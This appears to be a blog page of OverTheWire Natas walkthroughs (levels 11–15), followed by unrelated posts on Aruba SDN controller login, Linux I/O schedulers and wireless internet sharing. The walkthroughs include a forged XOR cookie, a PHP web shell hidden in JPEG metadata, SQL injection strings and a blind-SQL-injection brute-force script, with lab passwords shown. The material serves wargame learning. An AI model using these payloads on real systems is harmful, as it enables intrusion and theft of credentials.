Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas11:

URL: http://natas11.natas.labs.overthewire.org/

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>

 

Solution: Logic of XOR Encryption

If you check the source code and the server responses, you realize that you know both the ciphertext and the plaintext, so we can extract the XOR encryption key for this challenge.

Plain Text  XOR Key = Cipher Text

Cipher Text XOR Plain Text = Key

tesla@otuken:~$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8

The Set-Cookie value is URL-encoded (%3D is '='), so the base64 cipher is: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=

<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>

Result:

{"showpassword":"no","bgcolor":"#ffffff"}

Let’s XOR the cipher with {"showpassword":"no","bgcolor":"#ffffff"}, the known plaintext, to recover the key.


Key is: qw8J

 

Encrypted cookie for showing password is:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
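The whole key-recovery and cookie-forging procedure can be sketched in Python (a minimal sketch; the cipher value is the cookie from the curl output above):

```python
import base64
from itertools import cycle

# Known plaintext: the default data the PHP code serializes into the cookie.
plaintext = b'{"showpassword":"no","bgcolor":"#ffffff"}'
# Cookie from the server response, URL-decoded (%3D -> '=').
cipher = base64.b64decode("ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=")

def xor(data: bytes, key: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, cycle(key)))

# Cipher XOR plaintext reveals the repeating keystream.
key = xor(cipher, plaintext)[:4]   # repeats as qw8Jqw8J...
print(key.decode())                # qw8J

# Forge a cookie with showpassword flipped to "yes".
forged = b'{"showpassword":"yes","bgcolor":"#ffffff"}'
forged_cookie = base64.b64encode(xor(forged, key)).decode()
print(forged_cookie)
```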

 

curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org


Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Natas12:

URL: http://natas12.natas.labs.overthewire.org/

1- Install exiftool.

2- Create a very small JPEG image smaller than 1 KiB and name it white.jpg (a small white background is enough).

3- The next step is injecting malicious PHP code inside white.jpg by using exiftool.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg

 

tesla@otuken:~/Downloads$ exiftool white.jpg
ExifTool Version Number         : 10.80
File Name                       : white.jpg
Directory                       : .
File Size                       : 917 bytes
File Modification Date/Time     : 2018:11:27 22:11:00+04:00
File Access Date/Time           : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time     : 2018:11:27 22:11:00+04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Document Name                   : <?php system('cat /etc/natas_webpass/natas13'); ?>
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 51
Image Height                    : 51
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 51x51
Megapixels                      : 0.003

 

4- Open the browser and make a web request to http://natas12.natas.labs.overthewire.org/

5- Open the browser’s “Developer tools” and remove the type=”hidden” attribute so the filename field becomes editable.

6- Modify the suffix from jpg to php.

7- Click the link of the uploaded file; it will be interpreted by PHP.


Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Natas13: 

URL: http://natas13.natas.labs.overthewire.org

You can use the same method as we did on natas12. The only thing you have to do is change the target file in the exiftool command.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas14'); ?>" white.jpg


Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas14:

URL: http://natas14.natas.labs.overthewire.org

 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas14', '<censored>'); 
    mysql_select_db('natas14', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    if(mysql_num_rows(mysql_query($query, $link)) > 0) { 
            echo "Successful login! The password for natas15 is <censored><br>"; 
    } else { 
            echo "Access denied!<br>"; 
    } 
    mysql_close($link); 
} else { 
?>

Solution:

username > " or "1"="1

password > " or "1"="1
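Substituting those values into the query template from the source code turns the WHERE clause into a tautology; a small Python sketch of the resulting string:

```python
# Rebuild the query the same way the PHP code concatenates it.
username = '" or "1"="1'
password = '" or "1"="1'
query = ('SELECT * from users where username="' + username +
         '" and password="' + password + '"')
print(query)
# SELECT * from users where username="" or "1"="1" and password="" or "1"="1"
```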

 

Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas15:

<? 

/* 
CREATE TABLE `users` ( 
  `username` varchar(64) DEFAULT NULL, 
  `password` varchar(64) DEFAULT NULL 
); 
*/ 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas15', '<censored>'); 
    mysql_select_db('natas15', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    $res = mysql_query($query, $link); 
    if($res) { 
    if(mysql_num_rows($res) > 0) { 
        echo "This user exists.<br>"; 
    } else { 
        echo "This user doesn't exist.<br>"; 
    } 
    } else { 
        echo "Error in query.<br>"; 
    } 

    mysql_close($link); 
} else { 
?> 

//omitted...

Solution:

My first guess for solving this challenge was the INTO OUTFILE statement. Unfortunately, I did not have permission to create a file. For more information check the secure_file_priv option of the MySQL server.

Example:

select * from users where username="natas16" into outfile "/var/www/html"

After three days of trying other methods I was stuck on this challenge, so I had to get a hint. The hint was “Blind SQL Injection”. After reading over some blog posts, I understood the logic and created my own solution to find the password. Basically, the script brute-forces the password by trying all letters (uppercase and lowercase) and digits.

 

#!/bin/bash

# Build the candidate alphabet: lowercase, uppercase and digits.
letters=""
for i in {a..z} {A..Z} {0..9}
do
	letters+=$i
done
#################################################################
echo $letters
echo ""

key=""

# Extend the known prefix one character at a time.
for count in {1..40}
do
for (( i=0; i<${#letters}; i++ )); do
	letter="${letters:$i:1}"
	# 'password like binary "<prefix>%"' is true only when the password
	# starts with that prefix (BINARY makes the comparison case-sensitive).
	curl -s -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" | grep -q "This user exists."
	if [ $? -eq 0 ] ; then
		key+=$letter
		break
	fi
done
done
echo "key is: $key"
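The same prefix-extension logic can be sketched offline in Python; the oracle function below is a hypothetical stand-in for the HTTP request (it answers exactly what the password LIKE BINARY "prefix%" condition answers server-side):

```python
import string

# Stand-in for the HTTP oracle: True when the page would say
# "This user exists.", i.e. when the password starts with the given prefix.
SECRET = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"  # natas16 password from this level

def oracle(prefix: str) -> bool:
    return SECRET.startswith(prefix)

alphabet = string.ascii_letters + string.digits
key = ""
while True:
    for ch in alphabet:
        if oracle(key + ch):
            key += ch
            break
    else:
        break  # no character extends the prefix: the password is complete

print(key)
```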


Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Aruba VAN SDN Controller (invalid user & password combination specified!)

Hello,

In this post, I will give the resolution of the “invalid user & password combination specified!” error shown by the Aruba VAN SDN Controller after a fresh installation from the .deb package.

Ubuntu version of the SDN Controller host:

tesla@hpcontroller:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty

Problem: invalid user & password combination specified!

Resolution: Re-installation of keystone.

 

$ sudo service sdnc stop
$ sudo apt-get purge keystone
$ sudo rm -Rf /var/lib/keystone/
$ sudo apt-get install keystone
$ sudo /opt/sdn/admin/config_local_keystone
$ sudo service sdnc start

After that, you can log in to the system with the default username and password:


username: sdn

password: skyline


How to Change I/O Scheduler in Linux

The Linux kernel is one of the most complicated pieces of software, used in a variety of systems such as laptops, embedded devices, hand-held devices, database servers, supercomputers, etc. All these kinds of devices demand different requirements, and some applications require a fast response to user input.

As you know, the disk is the slowest physical device in the computer world, even though SSD disks are now available on the market. The I/O scheduler enables access to the disk in an optimized way. The Linux kernel has a variety of I/O schedulers that greatly influence I/O performance. There is no single best I/O scheduler; each one delivers the best performance for a particular kind of application.

For example, one study observed that the Apache web server could achieve up to 71% more throughput using the anticipatory I/O scheduler. On the other hand, the anticipatory scheduler has been observed to result in a slowdown on a database run. (http://www.admin-magazine.com/HPC/Articles/Linux-I-O-Schedulers)

Currently Linux has several I/O schedulers:

  • Completely Fair Queuing (CFQ)
  • Deadline
  • NOOP
  • Anticipatory

 

I will not go into more detail in this post, but if you are really curious you can find more in the link above.

How to see active I/O Scheduler?

On my system the active I/O scheduler is CFQ; the current scheduler is the one shown in square brackets.

tesla@otuken:~$ cat /sys/block/sda/queue/scheduler
noop deadline [cfq]
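Parsing that line programmatically is straightforward; a small Python sketch (the sample line is the output shown above; on a live system you would read /sys/block/<dev>/queue/scheduler instead):

```python
# The active scheduler is the entry shown in square brackets.
def active_scheduler(line: str) -> str:
    start = line.index("[") + 1
    return line[start:line.index("]", start)]

print(active_scheduler("noop deadline [cfq]"))  # cfq
```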

How To change I/O Scheduler?

To change the scheduler, just echo the name of the desired scheduler into the sysfs file:

root@otuken:~# echo noop > /sys/block/sda/queue/scheduler
root@otuken:~# cat /sys/block/sda/queue/scheduler 
[noop] deadline cfq 

The kernel does not switch the I/O scheduler immediately; it waits until all of the requests that belong to the previous scheduler have completed.

How to change I/O scheduler in Grub and Grub2?

https://access.redhat.com/solutions/32376

 

Sharing Internet in Linux

Hi Folks!

Today I installed Ubuntu 18.04 LTS on my personal laptop, but I could not connect to the Internet because Ubuntu does not recognize my wireless adapter. After a couple of searches I found my wireless driver [model: Broadcom Limited BCM43142 802.11b/g/n]. But the problem was: how am I going to hook up to the Internet to install my driver?

I realized that I have my company’s laptop, a Lenovo T460, which is one of the best free-DOS laptops. 🙂 I booted it up with an Ubuntu Live CD. Finally I made the configuration shown in Figure-1.


Figure – 1 Sample Configuration For Sharing Internet.

After the above configuration everything worked excellently: I am able to hook up to the Internet on my Asus laptop via the Lenovo laptop.

To be honest, before the above configuration I tried to bridge the Ethernet interface with the wireless interface on the Lenovo laptop, but that is not permitted. After some research I found this:

http://kerneltrap.org/mailarchive/linux-ath5k-devel/2010/3/21/6871733

It’s no longer possible to add an interface in the managed mode to a
bridge. You should run hostapd first to put the interface to the
master mode.

Bridging doesn’t work on the station side anyway because the 802.11
header has three addresses (except when WDS is used) omitting the
address that would be needed for a station to send or receive a packet
on behalf of another system.

Final:

Necessary package to install for the Broadcom wireless driver:

tesla@otuken:~$ sudo apt-get update
tesla@otuken:~$ sudo apt-get install bcmwl-kernel-source

After installing the package and rebooting my laptop, it WORKED LIKE A CHARM!